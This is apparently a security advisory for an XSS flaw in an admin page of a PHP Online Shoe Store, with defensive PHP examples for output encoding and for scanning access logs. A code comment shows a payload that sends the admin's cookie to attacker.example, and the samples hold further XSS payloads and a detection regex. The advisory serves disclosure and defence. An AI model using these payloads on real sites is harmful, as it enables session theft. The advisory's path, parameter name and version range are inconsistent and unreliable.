Platform
php
Component
online-shoe-store
Fixed in
1.0.1
A cross-site scripting (XSS) vulnerability has been identified in Online Shoe Store versions 1.0.0 through 1.0. The flaw allows an attacker to inject script into pages served by the application by manipulating the productname parameter of /admin/adminrunning.php (the same file is referred to as /admin/admin_running.php elsewhere in this advisory). The vulnerability is remotely exploitable and a public proof of concept exists. Because the affected script sits under /admin, the likely victim is an authenticated administrator, and the impact therefore extends to administrative functions.
Successful exploitation of CVE-2026-5834 lets an attacker run arbitrary JavaScript in the browser of a user who loads the affected page, typically an administrator of the Online Shoe Store deployment. Possible outcomes include theft of the administrator's session cookie or tokens, defacement of the administrative interface, and exfiltration of data displayed in the admin area such as customer details or order information. Because /admin/admin_running.php is an administrative page, script running in that context can issue requests with the administrator's privileges and so potentially alter store configuration and data. The public proof of concept lowers the effort needed to weaponise the flaw, although the attacker still has to get a crafted request or link in front of an administrator.
CVE-2026-5834 carries a CVSS score of 2.4 and is rated low risk; the EPSS estimate of 0.03% (9th percentile) likewise predicts a low probability of exploitation in the wild. A public proof of concept nonetheless shows that exploitation is straightforward once an administrator can be induced to open a crafted link. The vulnerability was disclosed on 2026-04-09. No active exploitation campaigns have been reported, but since the fix is a point release (1.0.1), the low score is no reason to defer the upgrade.
Exploit Status
EPSS
0.03% (9th percentile)
The primary mitigation for CVE-2026-5834 is to upgrade to Online Shoe Store 1.0.1 or later, the version listed above as containing the fix. Where the upgrade cannot be applied immediately, apply contextual output encoding (in PHP, htmlspecialchars() with ENT_QUOTES) wherever the productname value handled by /admin/adminrunning.php is written into HTML, and validate the parameter against its expected format on input. Encoding is the control that actually prevents XSS; validation is defence in depth and must not replace it. A Web Application Firewall (WAF) with XSS rules can block obvious payloads but is bypassable and should be treated as a stop-gap only. Review access logs for requests to the /admin/admin_running.php endpoint whose productname value contains markup or URL-encoded angle brackets, and treat any such hit as a sign that an administrator may have been targeted.
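The interim hardening described above, shown as an added example rather than code from the Online Shoe Store project: a vulnerable handler that echoes the parameter straight into HTML beside a hardened version that validates on input and encodes on output. The function names, the allow-list pattern and the HTML layout are assumptions made for the illustration; only the productname parameter name comes from the advisory.

```php
<?php
// Added illustration for this advisory, not code from the Online Shoe Store
// project. Function names, the allow-list and the markup are assumptions;
// only the parameter name "productname" is taken from the advisory text.

declare(strict_types=1);

// Vulnerable pattern: the untrusted parameter is written into HTML unencoded.
// A value such as <script>fetch('//attacker.example/?c='+document.cookie)</script>
// is rendered as markup and executes in the administrator's browser.
function renderVulnerable(array $get): string
{
    $name = $get['productname'] ?? '';
    return '<h2>Running product: ' . $name . '</h2>';
}

// Input validation (defence in depth): reject values that cannot be a product
// name. Assumption: names are short, printable text; adjust to the real schema.
// This is secondary; the output encoding below is what stops the XSS.
function validateProductName(string $raw): ?string
{
    if (strlen($raw) > 200) {
        return null;
    }
    if (!preg_match('/\A[\p{L}\p{N} .,&\'()-]+\z/u', $raw)) {
        return null;
    }
    return $raw;
}

// Contextual output encoding for an HTML text or quoted-attribute context.
// ENT_QUOTES also encodes single quotes, so the value is safe inside value='...'.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: validate, then encode every time the value reaches HTML.
function renderHardened(array $get): string
{
    $name = validateProductName((string)($get['productname'] ?? ''));
    if ($name === null) {
        return '<p>Invalid product name.</p>';
    }
    return '<h2>Running product: ' . e($name) . '</h2>'
         . '<input type="text" name="productname" value="' . e($name) . '">';
}

// Constructed demo input in the style of a reflected-XSS proof of concept.
$payload = ['productname' => 'Air Max"><script>alert(document.domain)</script>'];

echo renderVulnerable($payload), PHP_EOL;   // <script> survives intact
echo renderHardened($payload), PHP_EOL;     // rejected by the allow-list
echo e($payload['productname']), PHP_EOL;   // even without validation, encoding yields &lt;script&gt;
echo renderHardened(['productname' => "Runner's Choice"]), PHP_EOL; // passes; apostrophe becomes &apos;
```

Run it with `php example.php`. The third line of output is the important one: even if the allow-list were too strict or too loose for the real data, encoding alone turns the payload into inert text, which is why the fix belongs at the point where the value is written into HTML, not only at the point where it is read.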
Update Online Shoe Store to version 1.0.1 or later, which fixes the cross-site scripting (XSS) vulnerability in admin_running.php. Check the project's release notes or source repository for update instructions, or contact the developer for support.
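The access-log review suggested in the mitigation guidance, as an added example that is not part of the original advisory: it parses combined-format web server log lines, keeps only requests to the affected admin script, URL-decodes the productname value (twice, to catch double encoding) and flags values that contain markup or event-handler fragments. The log lines are constructed for the example, and /admin/admin_running.php is one of the two spellings of the path used on this page.

```php
<?php
// Added example for this advisory, not code from the Online Shoe Store project.
// Scans Apache/nginx combined-format access log lines for requests to the
// affected admin script whose productname value decodes to something that looks
// like markup. The sample log lines below are constructed.

declare(strict_types=1);

const TARGET_PATH = '/admin/admin_running.php';

// Combined log format:
// client - user [time] "METHOD PATH HTTP/x" status size "referer" "user-agent"
function parseRequestLine(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) ([^" ]+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    $url = parse_url($m[4]);
    if ($url === false || !isset($url['path'])) {
        return null;
    }
    $params = [];
    if (isset($url['query'])) {
        parse_str($url['query'], $params); // decodes one layer of URL encoding
    }
    return [
        'client' => $m[1], 'time' => $m[2], 'method' => $m[3],
        'path' => $url['path'], 'params' => $params, 'status' => (int) $m[5],
    ];
}

// Angle brackets, a double quote (attribute breakout), javascript: URLs,
// on*= event handlers or HTML entities have no place in a product name.
function isSuspicious(string $value): bool
{
    $decoded = strtolower(urldecode($value)); // second decode catches %253C -> %3C -> <
    return (bool) preg_match('/[<>"]|javascript:|\bon[a-z]+\s*=|&#/', $decoded);
}

function findSuspiciousRequests(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $req = parseRequestLine($line);
        if ($req === null || $req['path'] !== TARGET_PATH) {
            continue;
        }
        $value = $req['params']['productname'] ?? null;
        if (is_string($value) && isSuspicious($value)) {
            $hits[] = sprintf('%s %s %s productname=%s (HTTP %d)',
                $req['time'], $req['client'], $req['method'], urldecode($value), $req['status']);
        }
    }
    return $hits;
}

// Constructed sample: a benign admin request, a plain <script> payload,
// a double-encoded attribute-breakout payload, and an unrelated page.
$sample = [
    '198.51.100.7 - admin [09/Apr/2026:10:12:01 +0000] "GET /admin/admin_running.php?productname=Trail+Runner HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.42 - - [09/Apr/2026:10:13:44 +0000] "GET /admin/admin_running.php?productname=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5311 "-" "curl/8.5.0"',
    '203.0.113.42 - - [09/Apr/2026:10:13:59 +0000] "GET /admin/admin_running.php?productname=x%2522%2520onmouseover%253Dalert(1) HTTP/1.1" 200 5298 "-" "curl/8.5.0"',
    '198.51.100.9 - - [09/Apr/2026:10:14:10 +0000] "GET /index.php?productname=%3Cb%3Esale%3C%2Fb%3E HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
];

foreach (findSuspiciousRequests($sample) as $hit) {
    echo $hit, PHP_EOL;
}
```

Only the two requests from 203.0.113.42 are reported; the benign edit and the request to an unrelated page are ignored. A 200 response to a payload request does not by itself prove an administrator executed it, so each hit should be correlated with that administrator's session activity before concluding that a compromise occurred. POST bodies are not in the access log, so if the parameter can also be submitted by POST this check has to run against application-level logging instead.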
CVE-2026-5834 is a cross-site scripting (XSS) vulnerability in Online Shoe Store versions 1.0.0 through 1.0 that allows an attacker to inject script into the application via the product_name parameter of the admin running-products page.
If you are running Online Shoe Store version 1.0.0 through 1.0, you are affected by this vulnerability. Upgrade to version 1.0.1 or later.
The recommended fix is to upgrade to Online Shoe Store 1.0.1 or later. If the upgrade must wait, encode the productname value on output and validate it on input as an interim measure.
No active exploitation has been confirmed, but a public proof of concept exists, which lowers the barrier to exploitation.
Refer to the Online Shoe Store vendor's website or security advisory page for the official advisory regarding CVE-2026-5834.